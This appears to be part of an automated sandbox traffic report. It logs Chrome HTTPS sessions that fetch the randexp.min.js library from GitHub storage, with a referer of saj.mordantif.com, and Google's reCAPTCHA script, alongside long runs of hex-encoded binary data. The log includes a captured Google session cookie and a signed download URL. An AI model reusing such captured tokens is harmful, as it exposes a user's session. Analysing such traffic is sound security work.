                                                        2024-09-13 13:07:06 UTC1369INData Raw: 56 64 3e 23 ce b8 34 d4 96 47 4a c0 1c 9f 8f df e5 cd bc 08 e7 46 48 4a 19 62 c7 32 7b 4d 8f 27 ea 39 53 c8 f9 2e c8 fb 5e f8 a8 23 b2 9f 23 cc ab 0d ae 13 e5 b7 02 b1 e4 5e f3 64 25 c6 59 47 79 27 57 f2 6b bc 9d 17 71 0d 4a ef 32 29 64 e6 07 fd c8 0d f3 6c fe 2b ea 6c d0 ad f1 3a ea 09 3a e4 f0 74 68 df f6 d3 90 93 1a b3 57 63 bf f6 a8 68 37 cc 27 a1 a7 e9 68 b5 0a d7 0d 7a 3f a4 94 39 89 9e 85 1d 49 32 eb 54 3a bf 41 ae cc 6c 1f 3c b0 de 37 67 8f 01 8f 00 b7 9a d8 75 4d ae b4 25 0e 6d c9 3b f6 1e 10 a1 d8 5e b4 54 8d f4 85 ec 5f 3c c5 11 ab 67 ec 5a a7 77 cc a0 be 2e da da c8 b5 a6 d6 49 b3 93 c6 2e d5 d8 b6 7c b8 e5 6a 65 1e 2d 26 9e 73 c6 8d ba d7 72 11 33 17 78 ea 78 9b f2 7a bd 63 8f e7 be d6 9e 05 06 7e 56 cb f9 53 af e7 75 f5 d5 9d 99 42 1f ab c8
                                                        Data Ascii: Vd>#4GJFHJb2{M'9S.^##^d%YGy'WkqJ2)dl+l::thWch7'hz?9I2T:Al<7guM%m;^T_<gZw.I.|je-&sr3xxzc~VSuB
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 1e 6d 7b e6 31 7c f1 f7 3a b4 90 97 c3 ed 7d 71 d3 6e 84 68 79 ca f8 dc f1 8a 13 b3 46 8f 64 ca 90 57 04 ab fe 26 a2 a8 50 fc 31 a1 ac 4e 26 47 7d ab d2 e0 91 b2 86 88 7e c1 3e ae 8b 79 fb 60 7b 74 8e 13 fd 1f a1 b3 e5 e6 42 d7 57 d7 da bb 7d 81 6b 5b d1 7d 72 64 14 2e ba aa 47 10 8d d1 a3 4d c7 ea d9 76 a6 e5 08 d2 b5 51 8b 62 2d 64 94 25 38 e2 68 b6 89 9d c2 90 ce 46 91 fc d0 e9 7f 67 e7 e0 e8 ac fc 49 8d 8d 1a e2 cf e2 c4 e7 7f 04 5b 89 fb 43 d1 f2 e2 8e f9 8e da 56 c1 9e 6f 30 cf f6 9d de 6c 27 de 0b c0 7b d6 e9 55 03 53 4b 46 dc 79 a3 06 ef de 88 a8 16 bc 71 e4 0e 89 15 da 90 f5 76 e5 3d e8 ed 4d d4 ea 96 2f 6e 44 fe 1c 6c c5 94 f8 6b ab a2 c9 2d f7 76 46 bc 59 93 3b f7 a7 ef 8b f8 9d f6 c6 98 ed e4 57 23 a6 aa 8e b6 ef 90 f6 da d6 77 95 44 d1 53 09
                                                        Data Ascii: m{1|:}qnhyFdW&P1N&G}~>y`{tBW}k[}rd.GMvQb-d%8hFgI[CVo0l'{USKFyqv=M/nDlk-vFY;W#wDS
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 9d 78 70 bb 01 8d f1 0f 5c 20 73 e7 f4 80 90 ec 7e 38 f0 a3 56 e0 c7 e8 e3 7d d2 4f 07 7e 26 30 b2 0d b8 df c0 03 2e 8c 72 e1 9b 3a 86 21 ce e9 26 ff 3e ac d3 30 c0 1d f4 8f 92 d2 69 00 75 81 cf f2 23 ea ba 0d 25 6f 13 b8 0c de f1 3c ba 07 d0 03 5e e4 7c ba 40 f4 b7 2b d9 bb f2 f4 57 71 69 64 ff 53 f4 70 99 b5 89 9e 99 f1 fe 4b 90 d6 75 a2 3b 01 57 d2 39 f4 5d fa 07 3a 13 d1 db c5 d0 7f e7 4b e9 db 4c bb 67 9b ef 91 cf d2 91 9c 1c ff 24 a0 b5 74 03 28 ab 50 d3 19 48 fd dd 73 92 b9 b3 ef 75 3a 07 ba da 43 fe 97 ef 7c e8 aa 4f 56 06 94 bc d9 1f cf 73 64 9d f3 76 48 59 7f c1 aa 7f 14 a8 36 41 d7 e4 40 ff 56 a1 ad 12 49 1e 7c e3 bd 13 0b dd 4d fe 39 2e 24 0b f4 68 03 2c 03 29 2e f8 0c e8 9a fc a0 71 2a 24 40 ff 3b e4 b9 b8 d6 2b d1 67 02 ce 36 d7 f9 22 1f bd
                                                        Data Ascii: xp\ s~8V}O~&0.r:!&>0iu#%o<^|@+WqidSpKu;W9]:KLg$t(PHsu:C|OVsdvHY6A@VI|M9.$h,).q*$@;+g6"
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 63 21 39 21 b9 6e ac 3b c1 9d ee 2e 76 33 dc 15 ee 2a 77 83 bb d9 dd e7 1e 74 0b dd d3 5e 4d af 8e e7 7a 3e 2f ca 6b e9 75 f0 62 bc a5 de 0a 2f cb cb f6 d6 45 d6 8a f4 45 46 45 4e 8b 4c f6 39 be 70 5f 15 5f 75 5f 1d 9f eb 6b e6 eb e2 8b f3 3d d4 78 7b d0 09 56 fc 65 d3 59 e7 6c 68 71 b1 e9 f3 68 41 07 6e a4 2f 03 4c d7 60 46 90 ca 72 b2 58 c3 7a b9 a6 2b cf 74 fd a0 33 4e 44 a9 ae 2d 4e 41 a9 ae 18 37 d1 9d e6 2e 74 d3 dd e5 6e 96 9b e3 e6 b9 7b dc 7c f7 47 f7 94 57 c3 8b f0 ea 79 9e e9 6a e1 b5 2f d7 b5 f2 5f 75 55 fb 8b ae 81 a6 8b 60 a8 e9 52 99 2e 4d 84 e2 4d a6 2f 86 58 3a f1 f7 51 07 8a 8e 96 dd 16 0d 2b 1a 54 94 04 e7 22 8a ea f2 9f 23 98 50 be 0e 0e a6 06 63 83 93 03 e7 82 04 ce 04 7e 0d 14 06 32 02 63 02 ab 8f 3f 75 fc 49 ff 01 7f be 7f 07 f8 73
                                                        Data Ascii: c!9!n;.v3*wt^Mz>/kub/EEFENL9p__u_k=x{VeYlhqhAn/L`FrXz+t3ND-NA7.tn{|GWyj/_uU`R.MM/X:Q+T"#Pc~2c?uIs
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 8e 7d 5f 63 dd ad 18 fe a6 ff 2f f7 e0 48 1c b2 5f b8 86 07 10 29 77 0d 94 bb da 56 ae 12 b2 a3 52 05 42 25 2a c4 14 33 04 30 9f 14 5e 4b 90 15 6a 35 2d 17 f1 e9 d1 c8 8c 10 b7 07 f7 7c d3 af d8 6b dd ed c3 7e 30 12 fb 17 34 1b 0d 60 54 b1 df fa a9 f5 63 20 86 c1 4c 3a c3 70 bf e7 87 a0 95 ae a4 74 86 83 52 38 d4 c4 23 96 f5 2c c3 50 ba 17 53 ce 30 ae 2e 00 50 aa d5 6a 85 52 1b 8f 90 9e d5 b1 7a a4 65 75 f8 2d ac bd b6 ce 7a b1 ff 71 ec 9f 37 82 ee f0 43 77 d6 a3 32 e1 06 3f f4 99 35 07 ca 67 99 f7 a1 fc 9d 50 be 0f 13 ca c4 30 53 2d d9 2e 88 c7 84 7e cc 00 53 f9 46 86 65 09 e9 8c 67 99 12 71 1c e1 0e f2 42 e5 e1 61 be 9a 68 7d 58 4c 78 4c 48 90 26 d4 37 34 31 42 05 cd d2 e8 52 c3 b0 9f af 42 e9 ef ef e7 eb 89 f5 3a 94 9a 87 d3 d3 62 f4 3a 35 4a cd 10 7f
                                                        Data Ascii: }_c/H_)wVRB%*30^Kj5-|k~04`Tc L:ptR8#,PS0.PjRzeu-zq7Cw2?5gP0S-.~SFegqBah}XLxLH&741BRB:b:5J
                                                        2024-09-13 13:07:06 UTC1369INData Raw: cd 45 45 5b 6e 74 ff e5 22 3a 74 e6 cc b9 53 7f e5 87 cc 6d c7 17 37 9e 58 9a 61 3d 8f bf da d6 df b7 4b 50 42 bd 3d a3 67 f9 eb c0 1f 2d 93 c4 58 2c 53 c3 42 43 82 7d 78 cc fa 69 c0 20 c0 a5 be 64 0a 9e 9c 65 81 01 88 31 44 07 24 05 26 01 cb b4 48 3b 39 cb 94 5a a5 81 b0 2d c3 6c 30 6b 33 32 c6 f1 0e d9 78 46 3e e7 ce fa d1 f2 57 cb 5e e9 9d 37 9c fe 79 f7 27 e9 a9 c0 3b 67 3c 3c 26 dc 5d f2 a3 e6 57 cd 53 8f 19 a3 3f 6f fc a4 ec ad c9 78 79 1f 9d 93 83 99 54 4b 12 0b 76 02 99 91 c5 a9 bf 11 b4 36 5b cb d8 4d ff be 9a a0 00 4d b0 6f b0 4e 3d cd 57 09 52 85 60 06 06 51 8d 8c 84 e9 16 f4 06 30 58 9e 7d b9 85 f7 df 83 ba 5f 10 1e 67 15 ac 70 e7 22 7a b2 f3 d1 f5 d3 05 c3 d1 fb ce 1f 12 04 f6 ee ee 1f c5 58 d7 e3 55 d6 fd c0 ec a5 87 85 c7 b6 f6 f6 0e 0a be
                                                        Data Ascii: EE[nt":tSm7Xa=KPB=g-X,SBC}xi de1D$&H;9Z-l0k32xF>W^7y';g<<&]WS?oxyTKv6[MMoN=WR`Q0X}_gp"zXU
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 4c b9 65 66 58 28 56 91 e1 64 93 29 7b 49 42 60 ed 03 9f cb 18 22 48 2e 36 7a 83 03 35 3e 6a 6f 2f 4f 0f 91 68 05 13 81 22 5c c7 a8 b6 1b 5a 7e 9e ec 18 e9 ec db 4d dd c5 79 d6 39 63 8e 50 de 92 69 ba a9 29 09 85 41 a5 86 35 c2 9c ee ea a2 0d 46 69 bc 85 9e 62 63 a7 96 c5 98 32 8d fa e9 a6 3c 42 73 99 50 85 5d e8 fc 01 d6 90 c6 c7 45 c1 51 25 20 cf 23 ac 8d 3a 6f 4f e0 23 cc 22 dc 18 45 30 7d 8c e3 61 54 6b 6f 99 e5 62 75 53 ae 29 61 46 48 99 b1 47 a8 5a 59 5b d6 17 45 d8 15 d2 5b 98 91 13 6d 98 9e 99 4d e6 2c a1 8a ce 59 09 c4 8f 57 20 c4 c6 c5 42 3f e2 52 e2 72 d2 99 8f 8e 3e 6d 19 58 10 76 dd 69 88 0e 0c f0 d3 78 7b b9 2a 99 04 94 60 d7 9d 64 90 39 ce 6a 0a a5 82 fc df 8e 4b 47 9b 7b e3 a6 f8 4f 09 1c 20 73 dd fd cf ff e0 dc c5 92 32 5d 71 74 62 a6 25
                                                        Data Ascii: LefX(Vd){IB`"H.6z5>jo/Oh"\Z~My9cPi)A5Fibc2<BsP]EQ% #:oO#"E0}aTkobuS)aFHGZY[E[mM,YW B?Rr>mXvix{*`d9jKG{O s2]qtb%


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        47192.168.2.549783185.199.110.1334433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:05 UTC1125OUTGET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240913%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240913T130616Z&X-Amz-Expires=300&X-Amz-Signature=012060cabb4d90d7bb147ccc7111563bd05e78b595e483f09ff2bc4e80b1baaf&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1
                                                        Host: objects.githubusercontent.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://saj.mordantif.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:07:06 UTC846INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Length: 10245
                                                        Content-Type: application/octet-stream
                                                        Last-Modified: Tue, 07 Dec 2021 16:38:45 GMT
                                                        ETag: "0x8D9B9A009499A1E"
                                                        Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                        x-ms-request-id: c04d24d1-701e-006d-40c9-dd551e000000
                                                        x-ms-version: 2020-10-02
                                                        x-ms-creation-time: Tue, 17 Aug 2021 14:57:31 GMT
                                                        x-ms-blob-content-md5: bCCivoupALwKcRiJOisQcg==
                                                        x-ms-lease-status: unlocked
                                                        x-ms-lease-state: available
                                                        x-ms-blob-type: BlockBlob
                                                        Content-Disposition: attachment; filename=randexp.min.js
                                                        x-ms-server-encrypted: true
                                                        Via: 1.1 varnish, 1.1 varnish
                                                        Fastly-Restarts: 1
                                                        Accept-Ranges: bytes
                                                        Age: 4200
                                                        Date: Fri, 13 Sep 2024 13:07:06 GMT
                                                        X-Served-By: cache-iad-kiad7000071-IAD, cache-nyc-kteb1890099-NYC
                                                        X-Cache: HIT, HIT
                                                        X-Cache-Hits: 47, 0
                                                        X-Timer: S1726232826.035682,VS0,VE1
                                                        2024-09-13 13:07:06 UTC1378INData Raw: 2f 2f 0a 2f 2f 20 72 61 6e 64 65 78 70 20 76 30 2e 34 2e 33 0a 2f 2f 20 43 72 65 61 74 65 20 72 61 6e 64 6f 6d 20 73 74 72 69 6e 67 73 20 74 68 61 74 20 6d 61 74 63 68 20 61 20 67 69 76 65 6e 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 2e 0a 2f 2f 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 32 30 31 36 20 62 79 20 52 6f 6c 79 20 46 65 6e 74 61 6e 65 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 29 0a 2f 2f 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 2f 2f 20 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 2f 72 61 6e 64 65 78 70 2e 6a 73 2f 72 61 77 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 20 0a 2f 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 22 52 61 6e 64 45 78 70 22
                                                        Data Ascii: //// randexp v0.4.3// Create random strings that match a given regular expression.//// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent)// MIT License// http://github.com/fent/randexp.js/raw/master/LICENSE //!function(){var e="RandExp"
                                                        2024-09-13 13:07:06 UTC1378INData Raw: 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 72 61 6e 64 49 6e 74 26 26 28 65 2e 72 61 6e 64 49 6e 74 3d 74 2e 72 61 6e 64 49 6e 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 76 61 72 20 6e 2c 69 2c 70 2c 68 2c 63 3b 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61 73 65 20 6c 2e 52 4f 4f 54 3a 63 61 73 65 20 6c 2e 47 52 4f 55 50 3a 69 66 28 65 2e 66 6f 6c 6c 6f 77 65 64 42 79 7c 7c 65 2e 6e 6f 74 46 6f 6c 6c 6f 77 65 64 42 79 29 72 65 74 75 72 6e 22 22 3b 66 6f 72 28 65 2e 72 65 6d 65 6d 62 65 72 26 26 76 6f 69 64 20 30 3d 3d 3d 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 26 26 28 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 3d 74 2e 70 75 73 68 28 6e 75 6c 6c 29 2d 31 29 2c 6e 3d 65 2e 6f 70 74 69 6f 6e 73 3f 61 2e 63 61 6c 6c
                                                        Data Ascii: ),"function"==typeof t.randInt&&(e.randInt=t.randInt)}function u(e,t){var n,i,p,h,c;switch(e.type){case l.ROOT:case l.GROUP:if(e.followedBy||e.notFollowedBy)return"";for(e.remember&&void 0===e.groupNumber&&(e.groupNumber=t.push(null)-1),n=e.options?a.call
                                                        2024-09-13 13:07:06 UTC1378INData Raw: 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 2e 72 61 6e 64 65 78 70 28 74 68 69 73 29 7d 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 66 61 75 6c 74 52 61 6e 67 65 3d 6e 65 77 20 68 28 33 32 2c 31 32 36 29 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 72 61 6e 64 49 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 28 31 2b 74 2d 65 29 29 7d 7d 2c 7b 22 64 69 73 63 6f 6e 74 69 6e 75 6f 75 73 2d 72 61 6e 67 65 22 3a 32 2c 72 65 74 3a 33 7d 5d 2c 32 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 74 68 69 73 2e 6c 6f 77 3d 65 2c 74 68 69 73 2e 68 69 67 68 3d 74 2c 74 68 69 73 2e 6c 65
                                                        Data Ascii: en=function(){return c.randexp(this)}},c.prototype.defaultRange=new h(32,126),c.prototype.randInt=function(e,t){return e+Math.floor(Math.random()*(1+t-e))}},{"discontinuous-range":2,ret:3}],2:[function(e,t,n){function r(e,t){this.low=e,this.high=t,this.le
                                                        2024-09-13 13:07:06 UTC1378INData Raw: 2e 6c 65 6e 67 74 68 3b 29 74 2e 70 75 73 68 28 73 2e 72 61 6e 67 65 73 5b 6e 5d 2e 63 6c 6f 6e 65 28 29 29 2c 6e 2b 2b 3b 73 2e 72 61 6e 67 65 73 3d 74 2c 61 28 73 29 7d 76 61 72 20 73 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 3f 65 2e 72 61 6e 67 65 73 2e 66 6f 72 45 61 63 68 28 6e 29 3a 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 72 3f 6e 28 65 29 3a 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 65 29 2c 6e 28 6e 65 77 20 72 28 65 2c 74 29 29 29 2c 74 68 69 73 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 73 2e 72 61 6e 67 65 73 2e 6c 65 6e 67 74 68 26 26
                                                        Data Ascii: .length;)t.push(s.ranges[n].clone()),n++;s.ranges=t,a(s)}var s=this;return e instanceof o?e.ranges.forEach(n):e instanceof r?n(e):(void 0===t&&(t=e),n(new r(e,t))),this},o.prototype.subtract=function(e,t){function n(e){for(var t=[],n=0;n<s.ranges.length&&
                                                        2024-09-13 13:07:06 UTC1378INData Raw: 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 44 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 22 3a 68 2e 70 75 73 68 28 61 2e 77 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 53 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 2f 5c 64 2f 2e 74 65 73 74 28 6e 29 3f 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 46 45 52 45 4e 43 45 2c 76 61 6c 75 65 3a 70 61 72 73 65 49 6e 74 28 6e 2c 31 30 29 7d 29 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 62 72 65 61 6b 3b 63 61 73 65 22 5e 22 3a 68 2e 70 75 73 68 28 73 2e
                                                        Data Ascii: );break;case"D":h.push(a.notInts());break;case"s":h.push(a.whitespace());break;case"S":h.push(a.notWhitespace());break;default:/\d/.test(n)?h.push({type:o.REFERENCE,value:parseInt(n,10)}):h.push({type:o.CHAR,value:n.charCodeAt(0)})}break;case"^":h.push(s.
                                                        2024-09-13 13:07:06 UTC1378INData Raw: 68 26 26 63 28 69 29 2c 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 50 45 54 49 54 49 4f 4e 2c 6d 69 6e 3a 30 2c 6d 61 78 3a 31 2f 30 2c 76 61 6c 75 65 3a 68 2e 70 6f 70 28 29 7d 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 72 65 74 75 72 6e 20 30 21 3d 3d 6c 2e 6c 65 6e 67 74 68 26 26 72 2e 65 72 72 6f 72 28 65 2c 22 55 6e 74 65 72 6d 69 6e 61 74 65 64 20 67 72 6f 75 70 22 29 2c 75 7d 2c 74 2e 65 78 70 6f 72 74 73 2e 74 79 70 65 73 3d 6f 7d 2c 7b 22 2e 2f 70 6f 73 69 74 69 6f 6e 73 22 3a 34 2c 22 2e 2f 73 65 74 73 22 3a 35 2c 22 2e 2f 74 79 70 65 73 22 3a 36 2c 22 2e 2f 75 74 69 6c 22 3a 37 7d 5d 2c 34 3a 5b 66 75
                                                        Data Ascii: h&&c(i),h.push({type:o.REPETITION,min:0,max:1/0,value:h.pop()});break;default:h.push({type:o.CHAR,value:n.charCodeAt(0)})}return 0!==l.length&&r.error(e,"Unterminated group"),u},t.exports.types=o},{"./positions":4,"./sets":5,"./types":6,"./util":7}],4:[fu
                                                        2024-09-13 13:07:06 UTC1378INData Raw: 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 36 35 32 37 39 7d 5d 7d 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 30 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 33 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 32 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 33 7d 5d 7d 3b 6e 2e 77 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 31 7d 7d 2c 6e 2e 6e 6f 74 57 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 30 7d 7d 2c 6e 2e 69 6e
                                                        Data Ascii: r.CHAR,value:65279}]},i=function(){return[{type:r.CHAR,value:10},{type:r.CHAR,value:13},{type:r.CHAR,value:8232},{type:r.CHAR,value:8233}]};n.words=function(){return{type:r.SET,set:a(),not:!1}},n.notWords=function(){return{type:r.SET,set:a(),not:!0}},n.in
                                                        2024-09-13 13:07:06 UTC599INData Raw: 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 34 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 6f 72 64 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 35 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 36 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 37 5d 29 69 2e 70 75 73 68 28 7b 74 79 70 65 3a 72 2e 52 41 4e 47 45 2c 66 72 6f 6d 3a 28 61 5b 38 5d 7c 7c 61 5b 39 5d 29 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2c 74 6f 3a 61 5b 31 30 5d 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 3b 65 6c 73 65 7b 69 66 28 21 28 73 3d 61 5b 31 32 5d 29 29 72 65 74 75 72 6e 5b 69 2c 75 2e 6c 61 73 74 49 6e 64 65 78 5d 3b 69 2e 70 75
                                                        Data Ascii: hitespace());else if(a[4])i.push(o.notWords());else if(a[5])i.push(o.notInts());else if(a[6])i.push(o.notWhitespace());else if(a[7])i.push({type:r.RANGE,from:(a[8]||a[9]).charCodeAt(0),to:a[10].charCodeAt(0)});else{if(!(s=a[12]))return[i,u.lastIndex];i.pu


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        48192.168.2.549784142.250.184.1964433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:06 UTC660OUTGET /recaptcha/api.js HTTP/1.1
                                                        Host: www.google.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: NID=517=WAvHDQo9rXlVA_D7qBDiOgxhmpZ89HJycq3Y9gdpnS5ll8g5WhdhiYfdsaRX3V4ozs4YpMqq2M-92SZoOiJLG4ETue60Fve6SnphdxDx-JP5px97tStsOapKwSO2qkA4Wxb6HozFB1mvk8f4EutNee-LrItYewAmS1eoeaHIrfXyLjr-ZSSe9qJkIitU4oA
                                                        2024-09-13 13:07:06 UTC749INHTTP/1.1 200 OK
                                                        Content-Type: text/javascript; charset=utf-8
                                                        Expires: Fri, 13 Sep 2024 13:07:06 GMT
                                                        Date: Fri, 13 Sep 2024 13:07:06 GMT
                                                        Cache-Control: private, max-age=300
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                        Server: ESF
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Accept-Ranges: none
                                                        Vary: Accept-Encoding
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2024-09-13 13:07:06 UTC641INData Raw: 35 39 61 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                        Data Ascii: 59a/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
